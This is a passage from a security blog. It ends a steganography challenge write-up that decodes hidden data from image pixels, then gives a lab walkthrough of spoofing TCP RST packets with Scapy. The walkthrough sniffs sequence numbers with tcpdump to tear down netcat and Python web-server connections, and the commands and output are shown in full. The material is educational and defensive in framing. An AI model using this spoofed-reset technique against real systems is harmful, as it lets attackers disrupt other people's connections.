<span style="color: white;">pixel_bits = ''.join([ format(pixel, '>08b') for pixel in img_pixels_flat ])</span>
<span style="color: white;"># Print the first 24 bits (3 bytes)</span>
<span style="color: white;">pixel_bits[:24]</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">'110101011110011110110101'</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Extract every 3 bits again.</span>
<span style="color: white;"># Step an index by 3 and keep the bit just before it, i.e. positions 2, 5, 8, ...</span>
<span style="color: white;">pixel_bits_at_3 = []</span>
<span style="color: white;">index = 0</span>
<span style="color: white;">while index <= len(pixel_bits)-10:</span>
<span style="color: white;">    index += 3</span>
<span style="color: white;">    pixel_bits_at_3.append(pixel_bits[index-1])</span>
<span style="color: white;"># Get the first 16 bits</span>
<span style="color: white;">print(pixel_bits_at_3[:16])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['0', '1', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '0', '1', '0', '0']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Condense the bits into one string once again</span>
<span style="color: white;">pixel_at_3_condensed = ''.join(pixel_bits_at_3)</span>
<span style="color: white;"># Print the first 24</span>
<span style="color: white;">pixel_at_3_condensed[:24]</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">'011010010110010000100000'</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Get the bits expanded to recreate the bytes</span>
<span style="color: white;">pixel_bits_expanded = [ pixel_at_3_condensed[i:i+8] for i in range(0, len(pixel_at_3_condensed), 8) ]</span>
<span style="color: white;"># Get the first 24 bits / 3 bytes</span>
<span style="color: white;">print(pixel_bits_expanded[:3])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['01101001', '01100100', '00100000']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Print the first 629 bytes as the hint suggested</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">print(''.join([ chr(int(value, 2)) for value in pixel_bits_expanded ])[:629])</span></pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">id : 1
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Name : Peterman Catalog
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Phone : 6479991234
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">PrimaryContact : Jacopo Peterman
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Email : contact@peterman.com
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">id : 2
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Name : Yankee Stadium
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Phone : 6478881234
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">PrimaryContact : George SteinBrenner
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Email : contact@yankees.com
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">id : 3
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Name : Vandalay Industries
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Phone : 6477771234
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">PrimaryContact : Art Vandalay
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">Email : contact@vandalay.com
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">id investment_amount company_secret
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">-- ----------------- --------------
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> 1 150000 dogcatalog
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> 2 320000 secondteam
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> 3 69000 sunumbrellas</span></div><div><br /></div><div><br /></div><div>That's the end! I find this to be a very exciting challenge as it covered many areas of Incident Response.</div><div><br /></div><div>My <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Nik's%20Response%20to%20Jean's%20Stego%20Challenge.ipynb" target="_blank">Jupyter Notebook</a> for this decoding can be found on my GitHub.</div><div><br /></div><div><br /></div><div>References:</div><div><a href="https://stackoverflow.com/questions/34412754/trying-to-remove-non-printable-characters-junk-values-from-a-unix-file">https://stackoverflow.com/questions/34412754/trying-to-remove-non-printable-characters-junk-values-from-a-unix-file</a></div><div><a href="https://www.man7.org/linux/man-pages/man1/tr.1.html">https://www.man7.org/linux/man-pages/man1/tr.1.html</a></div><div><a href="https://github.com/mikefara">https://github.com/mikefara</a></div><div><a href="https://learn.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql?view=sql-server-ver16</a></div><div><a href="https://theserogroup.com/sql-server/whos-the-sql-server-database-owner-and-how-can-you-change-it/">https://theserogroup.com/sql-server/whos-the-sql-server-database-owner-and-how-can-you-change-it/</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-tables-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-tables-transact-sql?view=sql-server-ver16</a></div><div><a 
href="https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-server-principals-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-server-principals-transact-sql?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-server-permissions-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-server-permissions-transact-sql?view=sql-server-ver16</a></div><div><a href="https://en.dirceuresende.com/blog/sql-server-como-utilizar-o-execute-as-para-executar-comandos-como-outro-usuario-impersonate-e-como-impedir-isso/">https://en.dirceuresende.com/blog/sql-server-como-utilizar-o-execute-as-para-executar-comandos-como-outro-usuario-impersonate-e-como-impedir-isso/</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/security/trustworthy-database-property?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/security/trustworthy-database-property?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/databases/master-database?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/databases/master-database?view=sql-server-ver16</a></div><div><a 
href="https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-configure-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-configure-transact-sql?view=sql-server-ver16</a></div><div><a href="http://sp-configure.com/tips-tricks/sp_configure-command/">http://sp-configure.com/tips-tricks/sp_configure-command/</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/t-sql/statements/enable-trigger-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/t-sql/statements/enable-trigger-transact-sql?view=sql-server-ver16</a></div><div><a href="https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-dropsrvrolemember-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-dropsrvrolemember-transact-sql?view=sql-server-ver16</a></div><div><a href="https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml">https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml</a></div><div><a href="https://learn.microsoft.com/en-us/sql/t-sql/statements/create-trigger-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/t-sql/statements/create-trigger-transact-sql?view=sql-server-ver16</a></div><div><a href="https://www.mssqltips.com/sqlservertip/5995/how-to-create-modify-or-drop-a-sql-server-trigger/">https://www.mssqltips.com/sqlservertip/5995/how-to-create-modify-or-drop-a-sql-server-trigger/</a></div><div><a 
href="https://learn.microsoft.com/en-us/sql/t-sql/statements/execute-as-transact-sql?view=sql-server-ver16">https://learn.microsoft.com/en-us/sql/t-sql/statements/execute-as-transact-sql?view=sql-server-ver16</a></div><div><a href="https://linux.die.net/man/1/nmap">https://linux.die.net/man/1/nmap</a></div><div><a href="https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.3">https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.3</a></div></div><div><div><a href="https://stackoverflow.com/questions/1425493/convert-hex-to-binary">https://stackoverflow.com/questions/1425493/convert-hex-to-binary</a></div><div><a href="https://stackoverflow.com/questions/10411085/converting-integer-to-binary-in-python">https://stackoverflow.com/questions/10411085/converting-integer-to-binary-in-python</a></div><div><a href="https://www.instructables.com/Hiding-Data-Inside-an-Image-Using-Python/">https://www.instructables.com/Hiding-Data-Inside-an-Image-Using-Python/</a></div><div><a href="https://www.youtube.com/watch?v=TWEXCYQKyDc">https://www.youtube.com/watch?v=TWEXCYQKyDc</a></div><div><a href="https://betterprogramming.pub/image-steganography-using-python-2250896e48b9">https://betterprogramming.pub/image-steganography-using-python-2250896e48b9</a></div><div><a href="https://vigrey.com/blog/encoding-information-into-images">https://vigrey.com/blog/encoding-information-into-images</a></div></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com3tag:blogger.com,1999:blog-7303400454979750101.post-8978108828386773922023-09-01T13:30:00.001-07:002023-09-01T14:06:58.434-07:00Packet Crafting - Tearing down a connection with TCP Reset<p>In a <a href="https://www.securitynik.com/2014/05/building-your-own-tcp-3-way-handshake.html" target="_blank">previous post</a>, I crafted a TCP 3-way handshake, to 
set up a connection with a remote device. In this post, we are going to sniff traffic between two devices and send a <i>RST </i>packet to tear down the connection. Think about what your IPS does as you go through this post.</p><p>First up, the manual process. Let's say a server (in this case <i>netcat</i>) is listening on port 9999, as shown here.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~$ nc -l -p 9999 -n -v -4</span>
<span style="color: white;">Listening on 0.0.0.0 9999</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>and here ....</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ ss --numeric --listening --tcp | grep 9999</span>
<span style="color: white;">LISTEN 0 1 0.0.0.0:9999 0.0.0.0:*</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>To be able to send a <i>RST</i>, we have to be able to see the traffic. Let's go ahead and set up <i>tcpdump </i>on our attacking machine to capture the traffic.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿hack-detect)-[~]</span>
<span style="color: white;">└─$ sudo tcpdump -nnti eth0 port 9999 -v -S 2>/dev/null</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>With <i>tcpdump </i>running, when a client connects, here is what we see from the server side:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~$ nc -l -p 9999 -n -v -4</span>
<span style="color: white;">Listening on 0.0.0.0 9999</span>
<span style="color: white;">Connection received on 192.168.240.1 55768</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>This session establishment can be confirmed by looking at the socket statistics via ss.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ ss --numeric --tcp | grep 9999</span>
<span style="color: white;">ESTAB 0 0 192.168.240.128:9999 192.168.240.1:55768</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>With this in place, here is what we see from the <i>tcpdump </i>perspective:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">IP (tos 0x0, ttl 64, id 38378, offset 0, flags [DF], proto TCP (6), length 60)</span>
<span style="color: white;"> 172.17.113.108.38364 > 192.168.240.128.9999: Flags [S], cksum 0xced5 (incorrect -> 0xd2e3), seq 2755343805, win 64240, options [mss 1460,sackOK,TS val 1927258560 ecr 0,nop,wscale 7], length 0</span>
<span style="color: white;">IP (tos 0x0, ttl 63, id 0, offset 0, flags [DF], proto TCP (6), length 60)</span>
<span><span style="color: white;"> 192.168.240.128.9999 > 172.17.113.108.38364: Flags [S.], cksum 0x3978 (correct), seq 1881702073, ack </span><b><span style="color: #fcff01;">2755343806</span></b><span style="color: white;">, win 65160, options [mss 1460,sackOK,TS val 4253133150 ecr 1927258560,nop,wscale 7], length 0</span></span>
<span style="color: white;">IP (tos 0x0, ttl 64, id 38379, offset 0, flags [DF], proto TCP (6), length 52)</span>
<span style="color: white;"> 172.17.113.108.38364 > 192.168.240.128.9999: Flags [.], cksum 0xcecd (incorrect -> 0x64d6), ack 1881702074, win 502, options [nop,nop,TS val 1927258561 ecr 4253133150], length 0</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>While this connection sits idle, we are going to pretend to be the client and send the server a message (a RST packet) to take down the connection. From the client's perspective above, what we need is its source IP, source port and, most importantly, the correct sequence number to send to the device on the other end. Fortunately for us, this information was captured by <i>tcpdump</i>. </div><div><br /></div><div>From above, when the server sent its <i>SYN/ACK</i> to the client, the acknowledgement number it specified was "2755343806". This is the next sequence number the server expects from the client, which is why a RST carrying exactly this value is accepted. With this in mind, let's craft a <i>RST </i>packet with <i>Scapy </i>and send it to the server.</div><div><br /></div></div><div>Using <i>Scapy </i>to craft and send the packet.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿hack-detect)-[~]</span>
<span style="color: white;">└─$ sudo scapy -H</span>
<span style="color: white;">[sudo] password for securitynik:</span>
<span style="color: white;">Welcome to Scapy (2.5.0) using IPython 8.5.0</span>
<span><span style="color: white;">>>> send(IP(src='172.17.113.108', dst='192.168.240.128')/TCP(sport=38364, dport=9999, flags='R', seq=</span><b><span style="color: #fcff01;">2755343806</span></b><span style="color: white;">)/"Boo I</span></span>
<span style="color: white;">...: Reset You!", count=1)</span>
<span style="color: white;">.</span>
<span style="color: white;">Sent 1 packets.</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>From our <i>tcpdump </i>perspective, here is what we see on the wire:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 56)</span>
<span style="color: white;"> 172.17.113.108.38364 > 192.168.240.128.9999: Flags [</span><span style="color: #fcff01;"><b>R</b></span><span><span style="color: white;">], cksum 0x2718 (correct), seq </span><b><span style="color: #fcff01;">2755343806</span></b><span style="color: white;">:2755343822, win 8192, length 16 [RST Boo I Reset You!]</span></span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Looking at the server side of the <i>netcat</i> session, we see it died, as <i>ss</i> returns nothing for either of the two commands we previously ran.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ ss --numeric --listening --tcp | grep 9999</span>
<span style="color: white;">sans@sec503:~/nik$ ss --numeric --tcp | grep 9999</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Interestingly, the <i>ncat </i>client did not die immediately. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿hack-detect)-[~]</span>
<span style="color: white;">└─$ ncat --verbose 192.168.240.128 9999</span>
<span style="color: white;">Ncat: Version 7.93 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Connected to 192.168.240.128:9999.</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>However, if you do try to use it to send some data to the server or even simply press <i>ENTER</i>, it will die with the following message:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">Ncat: Connection reset by peer.</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Let's give it another shot. This time, let's try to reset the connection between <i>netcat</i> and Python <i>http.server</i> running on port <i>8080</i>. We will follow the same concepts as above.</div><div><br /></div><div>Start up the web server</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~$ python3 -m http.server 8080</span>
<span style="color: white;">Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...</span>
</pre></td></tr></tbody></table></div>
</div><div><div>Validate that the server is listening.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ ss --numeric --listening --tcp | grep 8080</span>
<span style="color: white;">LISTEN 0 5 0.0.0.0:8080 0.0.0.0:*</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>As before, we need to be sniffing the traffic. Let's set up our <i>tcpdump</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿hack-detect)-[~]</span>
<span style="color: white;">└─$ sudo tcpdump -nnti eth0 port 8080 -v -S 2>/dev/null</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Connect with <i>ncat</i> to the web server</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿hack-detect)-[~]</span>
<span style="color: white;">└─$ ncat --verbose 192.168.240.128 8080</span>
<span style="color: white;">Ncat: Version 7.93 ( https://nmap.org/ncat )</span>
<span style="color: white;">Ncat: Connected to 192.168.240.128:8080.</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Validate on the server that the connection is established.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ ss --numeric --tcp | grep 8080</span>
<span style="color: white;">ESTAB 0 0 192.168.240.128:8080 192.168.240.1:55842</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Using the knowledge we acquired earlier, let's send a reset to the web server, pretending to be the client.</div><div><br /></div><div>Once again, <i>scapy</i> to the rescue. Using the <i>ACK </i>number from the <i>SYN/ACK</i> packet, we craft and send the RST packet.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">>>> send(IP(src='172.17.113.108', dst='192.168.240.128')/TCP(sport=53578, dport=8080, flags='R', seq=</span><b><span style="color: #fcff01;">3771376712</span></b><span style="color: white;">)/"Boo I</span></span>
<span style="color: white;">...: Reset You!", count=1)</span>
<span style="color: white;">.</span>
<span style="color: white;">Sent 1 packets.</span>
<span style="color: white;">>>></span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Looking at our <i>tcpdump</i> output, we see, </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">172.17.113.108.53578 > 192.168.240.128.8080: Flags [</span><b><span style="color: #fcff01;">R</span></b><span style="color: white;">], cksum 0x480f (correct), seq </span><span style="color: #fcff01;"><b>3771376712</b></span><span style="color: white;">:3771376728, win 8192, length 16 [RST Boo I Reset You!]</span></span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Did this work though? Let's look at the web server standard error messages.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">----------------------------------------</span>
<span style="color: white;">Exception occurred during processing of request from ('192.168.240.1', 55842)</span>
<span style="color: white;">Traceback (most recent call last):</span>
<span style="color: white;"> File "/usr/lib/python3.10/socketserver.py", line 683, in process_request_thread</span>
<span style="color: white;"> self.finish_request(request, client_address)</span>
<span style="color: white;"> File "/usr/lib/python3.10/http/server.py", line 1287, in finish_request</span>
<span style="color: white;"> self.RequestHandlerClass(request, client_address, self,</span>
<span style="color: white;"> File "/usr/lib/python3.10/http/server.py", line 651, in __init__</span>
<span style="color: white;"> super().__init__(*args, **kwargs)</span>
<span style="color: white;"> File "/usr/lib/python3.10/socketserver.py", line 747, in __init__</span>
<span style="color: white;"> self.handle()</span>
<span style="color: white;"> File "/usr/lib/python3.10/http/server.py", line 425, in handle</span>
<span style="color: white;"> self.handle_one_request()</span>
<span style="color: white;"> File "/usr/lib/python3.10/http/server.py", line 393, in handle_one_request</span>
<span style="color: white;"> self.raw_requestline = self.rfile.readline(65537)</span>
<span style="color: white;"> File "/usr/lib/python3.10/socket.py", line 705, in readinto</span>
<span style="color: white;"> return self._sock.recv_into(b)</span>
<span style="color: white;">ConnectionResetError: [Errno 104] Connection reset by peer</span>
<span style="color: white;">----------------------------------------</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Confirming via the <i>ss </i>command, the session is no longer established, as nothing was returned.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
